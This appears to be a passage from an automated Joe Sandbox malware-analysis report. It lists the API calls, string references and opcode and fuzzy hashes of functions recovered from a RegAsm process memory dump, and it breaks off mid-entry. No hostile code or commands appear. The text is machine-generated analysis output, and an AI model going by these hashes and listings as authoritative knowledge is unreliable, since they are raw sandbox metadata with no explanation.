                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 290601579-0
                                                                                                                                                                                                • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memchrmemset
                                                                                                                                                                                                • String ID: PD$PD
                                                                                                                                                                                                • API String ID: 1581201632-2312785699
                                                                                                                                                                                                • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2163313125-0
                                                                                                                                                                                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$wcslen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3592753638-3916222277
                                                                                                                                                                                                • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                                                                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                                                                • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                                • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                • String ID: ($d
                                                                                                                                                                                                • API String ID: 1140211610-1915259565
                                                                                                                                                                                                • Opcode ID: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0069feb4b1de97920c5300279c07769cea3f871f2420f4ec65c64da01ae34e30
                                                                                                                                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3015003838-0
                                                                                                                                                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 59245283-0
                                                                                                                                                                                                • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                                                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                • String ID: 3A
                                                                                                                                                                                                • API String ID: 3300951397-293699754
                                                                                                                                                                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                • String ID: strings
                                                                                                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                • API String ID: 776488737-1622828088
                                                                                                                                                                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                                                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                Strings
